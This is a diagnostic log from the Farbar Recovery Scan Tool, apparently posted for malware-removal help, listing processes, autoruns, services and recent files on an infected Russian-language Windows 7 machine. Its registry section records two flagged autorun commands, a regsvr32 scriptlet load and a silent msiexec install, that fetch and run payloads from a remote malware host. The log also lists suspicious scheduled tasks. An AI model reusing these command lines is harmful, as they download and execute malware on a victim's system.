Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-09-2017 Ran by Администратор (administrator) on ADMIN-PC (25-09-2017 21:43:13) Running from C:\Users\Администратор\Desktop Loaded Profiles: Администратор (Available Profiles: Администратор) Platform: Windows 7 Professional Service Pack 1 (X64) Language: Русский (Россия) Internet Explorer Version 11 (Default browser: Chrome) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (AMD) C:\Windows\System32\atiesrxx.exe (AMD) C:\Windows\System32\atieclxx.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Scarlet.Crush Productions) C:\Users\Администратор\Desktop\ScpServer\bin\ScpService.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe () C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Connect Firefox Software Updater\WCUService.exe (Flux Software LLC) C:\Users\Администратор\AppData\Local\FluxSoftware\Flux\flux.exe (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Connect IE Software Updater\WCUService.exe (Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Connect\ZyngaGamesAgent.exe (Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe (Microsoft Corporation) C:\Windows\System32\msiexec.exe (Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe () C:\Windows\debug\lsmose.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Farbar) C:\Users\Администратор\Desktop\FRST64 (1).exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13370472 2011-11-18] (Realtek Semiconductor) HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation) HKLM-x32\...\Run: [STCAgent] => C:\Program Files (x86)\Splashtop\Splashtop Connect IE\STCAgent.exe [776064 2011-03-04] (Splashtop Inc.) HKLM-x32\...\Run: [ZyngaGamesAgent] => C:\Program Files (x86)\Splashtop\Splashtop Connect\ZyngaGamesAgent.exe [841544 2010-11-15] (Splashtop Inc.) HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [225944 2017-04-11] () HKLM\...\Policies\Explorer: [NoRecentDocsHistory] 1 HKLM\...\Policies\Explorer: [NoRemoteRecursiveEvents] 1 HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3071776 2017-09-07] (Valve Corporation) HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Run: [Discord] => C:\Users\Администратор\AppData\Local\Discord\app-0.0.298\Discord.exe [57477112 2017-08-08] (Discord Inc.) HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Run: [f.lux] => C:\Users\Администратор\AppData\Local\FluxSoftware\Flux\flux.exe [1024240 2016-12-06] (Flux Software LLC) HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [NoInternetOpenWith] 1 HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [NoCDBurning] 1 HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [DisableThumbnailsOnNetworkFolders] 1 HKU\S-1-5-21-2248936580-358153698-228202076-500\...\MountPoints2: {0fc6072d-64af-11e7-823a-806e6f6e6963} - D:\Run.exe HKU\S-1-5-21-2248936580-358153698-228202076-500\...\MountPoints2: {42c8b24a-67b5-11e7-acf2-902b3412db62} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-2248936580-358153698-228202076-500\...\MountPoints2: {42c8b25c-67b5-11e7-acf2-902b3412db62} - E:\HiSuiteDownLoader.exe BootExecute: hex(7):61,00,75,00,74,00,6f,00,63,00,68,00,65,00,63,00,6b,00,20,00,61,00,75,00,74,00,6f,00,63,00,68,00,6b,00,20,00,2f,00,6b,00,3a,00,43,00,20,00,2a,00,00,00,00,00 ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b037a4da-4d56-43da-be16-466f04664fac} <==== ATTENTION (Restriction - IP) Tcpip\Parameters: [DhcpNameServer] 212.75.210.62 212.75.211.2 Tcpip\..\Interfaces\{8D977268-7885-49EC-BD9A-863AA5CE7973}: [DhcpNameServer] 212.75.210.62 212.75.211.2 Internet Explorer: ================== HKU\S-1-5-21-2248936580-358153698-228202076-500\Software\Microsoft\Internet Explorer\Main,Start Page = about:splashtopconnect SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/yandsearch?clid=49585&text={searchTerms} SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> {004C3885-1641-4e0f-913D-2C6AEACBD935} URL = hxxp://ru.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=IEBDSV SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/yandsearch?clid=49585&text={searchTerms} SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> {4D4C43BB-9BD5-455d-A93D-EE0C6AD7307F} URL = hxxp://www.google.com/cse?cx=partner-pub-3794288947762788%3A7941509802&ie=UTF-8&sa=Search&siteurl=www.google.com%2Fcse%2Fhome%3Fcx%3Dpartner-pub-3794288947762788%3A7941509802&q={searchTerms} SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> {EA6E525E-5959-4c44-9481-6914E554F3F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=SPLBR1&pc=SPLH FireFox: ======== FF HKLM-x32\...\Firefox\Extensions: [{91c612bf-2a7a-48b8-8c8c-6de28589b7a1}] - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{91c612bf-2a7a-48b8-8c8c-6de28589b7a1} FF Extension: (Splashtop Connect Companion) - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{91c612bf-2a7a-48b8-8c8c-6de28589b7a1} [2017-07-09] [not signed] FF HKLM-x32\...\Firefox\Extensions: [{91c612bf-2a7a-48b8-8c8c-6de28589b7a0}] - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{91c612bf-2a7a-48b8-8c8c-6de28589b7a0} FF Extension: (Splashtop Connect) - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{91c612bf-2a7a-48b8-8c8c-6de28589b7a0} [2017-07-09] [not signed] FF HKLM-x32\...\Firefox\Extensions: [{d9284e50-81fc-11da-a72b-0800200c9a66}] - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{d9284e50-81fc-11da-a72b-0800200c9a66} FF Extension: (Yoono) - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{d9284e50-81fc-11da-a72b-0800200c9a66} [2017-07-09] [not signed] FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-07-09] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-07-09] (Google Inc.) Chrome: ======= CHR Profile: C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default [2017-09-25] CHR Extension: (Google Презентации) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-07-09] CHR Extension: (MusVK - Скачать музыку с Вконтакте) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\afkpfjljjhhonjehpkmgonimjjgaheap [2017-09-23] CHR Extension: (Документы Google) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-07-09] CHR Extension: (Диск Google) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-07-09] CHR Extension: (YouTube) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-07-09] CHR Extension: (Google Таблицы) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-07-09] CHR Extension: (Google Документы офлайн) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-07-09] CHR Extension: (AdBlock) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-09-23] CHR Extension: (Steam Trader Helper) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhoahihokddepjlegpenefeaahdkojog [2017-07-27] CHR Extension: (friGate CDN - бесперебойный доступ к сайтам) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbacbcfdfaapbcnlnbmciiaakomhkbkb [2017-09-04] CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22] CHR Extension: (Gmail) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-07-09] CHR Extension: (Chrome Media Router) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-06] () S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1533448 2017-09-14] () S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-08-30] (BlueStack Systems, Inc.) S3 defragsvc; C:\Windows\System32\defragsvc.dll [291328 2009-07-14] (Корпорация Майкрософт) R2 Ds3Service; C:\Users\Администратор\Desktop\ScpServer\bin\ScpService.exe [381952 2014-03-13] (Scarlet.Crush Productions) [File not signed] S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [383016 2017-09-13] (EasyAntiCheat Ltd) R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [192200 2017-04-11] () [File not signed] R2 WCUService_STC_FF; C:\Program Files (x86)\Splashtop\Splashtop Connect Firefox Software Updater\WCUService.exe [493384 2010-11-30] (Splashtop Inc.) R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-03-14] (Microsoft Corporation) S3 WPCSvc; C:\Windows\System32\wpcsvc.dll [12288 2009-07-14] (Корпорация Майкрософт) S3 WPCSvc; C:\Windows\SysWOW64\wpcsvc.dll [10752 2009-07-14] (Корпорация Майкрософт) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [21616 2011-11-02] () S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-06-21] (Bluestack System Inc. ) S3 ew_usbccgpfilter; C:\Windows\System32\DRIVERS\ew_usbccgpfilter.sys [18944 2017-04-11] (Huawei Technologies Co., Ltd.) U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2017-04-11] (Huawei Technologies Co., Ltd.) R0 mountmgr; C:\Windows\System32\drivers\mountmgr.sys [94592 2010-11-21] (Корпорация Майкрософт) S3 PortTalk; C:\Windows\SysWOW64\Drivers\PortTalk.sys [3567 2017-07-09] (Beyond Logic hxxp://www.beyondlogic.org) [File not signed] R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions) R0 volmgrx; C:\Windows\System32\drivers\volmgrx.sys [363392 2010-11-21] (Корпорация Майкрософт) S3 gdrv; \??\C:\Windows\gdrv.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-09-25 21:43 - 2017-09-25 21:43 - 000013820 _____ C:\Users\Администратор\Desktop\FRST.txt 2017-09-25 21:42 - 2017-09-25 21:43 - 000000000 ____D C:\FRST 2017-09-25 21:30 - 2017-09-25 21:30 - 002399744 _____ (Farbar) C:\Users\Администратор\Desktop\FRST64 (1).exe 2017-09-25 20:16 - 2017-09-25 20:16 - 000003502 _____ C:\Windows\System32\Tasks\Mysa3 2017-09-25 20:16 - 2017-09-25 20:16 - 000003422 _____ C:\Windows\System32\Tasks\Mysa2 2017-09-25 20:16 - 2017-09-25 20:16 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 2017-09-25 20:16 - 2017-09-25 20:16 - 000003186 _____ C:\Windows\System32\Tasks\ok 2017-09-25 20:15 - 2017-09-25 21:37 - 000000000 ____D C:\AdwCleaner 2017-09-25 13:43 - 2017-09-25 13:44 - 000000000 ____D C:\Users\Администратор\Desktop\AutoLogger 2017-09-22 22:28 - 2017-09-22 22:28 - 000000000 ____D C:\Users\Администратор\Documents\Larian Studios 2017-09-22 22:25 - 2017-09-22 22:25 - 000000904 _____ C:\Users\Администратор\Desktop\Divinity - Original Sin 2.lnk 2017-09-22 22:25 - 2017-09-22 22:25 - 000000765 _____ C:\Users\Администратор\Desktop\Смена языка Divinity - Original Sin 2.lnk 2017-09-16 16:05 - 2017-09-16 17:23 - 000000000 ____D C:\Users\Администратор\AppData\Local\Ubisoft Game Launcher 2017-09-16 16:05 - 2017-09-16 16:05 - 000001219 _____ C:\Users\Администратор\Desktop\Uplay.lnk 2017-09-16 16:05 - 2017-09-16 16:05 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft 2017-09-16 16:05 - 2017-09-16 16:05 - 000000000 ____D C:\Program Files (x86)\Ubisoft 2017-09-16 13:05 - 2017-09-16 13:05 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\EasyAntiCheat 2017-09-14 21:29 - 2017-09-14 21:29 - 000000000 ____D C:\Users\Администратор\AppData\Local\CrashReportClient 2017-09-13 21:15 - 2017-09-13 21:15 - 000000000 ____D C:\Users\Администратор\AppData\Local\DeadByDaylight 2017-09-13 21:15 - 2017-09-13 17:46 - 000383016 _____ (EasyAntiCheat Ltd) C:\Windows\SysWOW64\EasyAntiCheat.exe 2017-09-13 17:31 - 2017-09-13 17:31 - 000000222 _____ C:\Users\Администратор\Desktop\Dead by Daylight.url 2017-09-12 20:04 - 2017-09-12 20:04 - 000000000 ____D C:\Users\Администратор\AppData\Local\Absolver 2017-09-06 22:18 - 2017-09-06 22:18 - 000000000 ____D C:\Users\Администратор\AppData\Local\TekkenGame 2017-09-06 22:01 - 2017-09-22 22:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by.xatab 2017-09-06 22:01 - 2017-09-06 22:01 - 000000678 _____ C:\Users\Администратор\Desktop\Tekken 7.lnk 2017-09-04 23:32 - 2017-09-21 21:40 - 000000000 ____D C:\Users\Все пользователи\BlueStacksSetup 2017-09-04 23:32 - 2017-09-21 21:40 - 000000000 ____D C:\ProgramData\BlueStacksSetup 2017-09-04 23:32 - 2017-09-04 23:32 - 000000659 _____ C:\Users\Public\Desktop\BlueStacks.lnk 2017-09-04 23:32 - 2017-09-04 23:32 - 000000659 _____ C:\ProgramData\Microsoft\Windows\Start Menu\BlueStacks.lnk 2017-09-04 23:31 - 2017-09-04 23:32 - 000000000 ____D C:\Program Files (x86)\BlueStacks 2017-09-04 23:30 - 2017-09-04 23:32 - 000000000 ____D C:\Users\Администратор\AppData\Local\Bluestacks 2017-08-31 02:46 - 2017-08-31 02:46 - 000000000 ____D C:\Splashtop ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-09-25 21:39 - 2009-07-14 10:20 - 000000000 ____D C:\Windows\Help 2017-09-25 21:38 - 2017-07-27 12:07 - 000000077 _____ C:\Windows\system32\ps 2017-09-25 21:38 - 2017-07-27 12:07 - 000000075 _____ C:\Windows\system32\p 2017-09-25 21:38 - 2009-07-14 12:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2017-09-25 21:37 - 2017-07-09 17:28 - 000065536 _____ C:\Windows\system32\spu_storage.bin 2017-09-25 21:14 - 2017-07-21 20:56 - 000000404 _____ C:\Windows\Tasks\update-sys.job 2017-09-25 20:17 - 2017-07-21 20:56 - 000000404 _____ C:\Windows\Tasks\update-S-1-5-21-2248936580-358153698-228202076-500.job 2017-09-25 16:50 - 2009-07-14 11:45 - 000016848 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2017-09-25 16:50 - 2009-07-14 11:45 - 000016848 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2017-09-25 12:39 - 2017-07-27 12:07 - 000000060 _____ C:\Windows\system32\s 2017-09-22 22:25 - 2017-07-11 17:14 - 000000000 ____D C:\Windows\SysWOW64\directx 2017-09-22 21:51 - 2017-07-10 19:32 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\BitTorrent 2017-09-16 16:07 - 2017-07-10 23:49 - 000000000 ____D C:\Users\Администратор\Documents\My Games 2017-09-14 14:23 - 2009-07-14 12:08 - 000032550 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2017-09-12 20:04 - 2017-07-10 15:19 - 000000000 ____D C:\Users\Администратор\AppData\Local\UnrealEngine 2017-09-12 12:29 - 2017-07-11 16:05 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\discord 2017-09-02 16:28 - 2017-08-20 21:19 - 000000000 ____D C:\Users\Администратор\Desktop\SpyHunter 4.21.10.4585 Portable by wood 2017-08-31 14:26 - 2011-04-12 20:26 - 000723936 _____ C:\Windows\system32\perfh019.dat 2017-08-31 14:26 - 2011-04-12 20:26 - 000150252 _____ C:\Windows\system32\perfc019.dat 2017-08-31 14:26 - 2009-07-14 12:13 - 001647438 _____ C:\Windows\system32\PerfStringBackup.INI 2017-08-31 14:26 - 2009-07-14 10:20 - 000000000 ____D C:\Windows\inf 2017-08-29 10:13 - 2017-07-09 17:25 - 000002203 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-08-29 10:13 - 2017-07-09 17:25 - 000002191 _____ C:\Users\Public\Desktop\Google Chrome.lnk ==================== Files in the root of some directories ======= 2017-07-21 20:56 - 2017-07-21 20:56 - 000000003 _____ () C:\Users\Администратор\AppData\Local\updater.log 2017-07-21 20:56 - 2017-07-21 20:56 - 000000425 _____ () C:\Users\Администратор\AppData\Local\UserProducts.xml 2017-07-10 16:26 - 2017-08-01 02:59 - 000000060 _____ () C:\ProgramData\SoftwareUpdateTemp.xml ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll [2010-11-21 10:24] - [2017-07-10 19:47] - 001008640 _____ (Microsoft Corporation) 2C353B6CE0C8D03225CAA2AF33B68D79 C:\Windows\SysWOW64\User32.dll [2010-11-21 10:24] - [2017-07-10 19:47] - 000833024 _____ (Microsoft Corporation) 861C4346F9281DC0380DE72C8D55D6BE C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\dnsapi.dll => File is digitally signed C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2017-09-24 10:50 ==================== End of FRST.txt ============================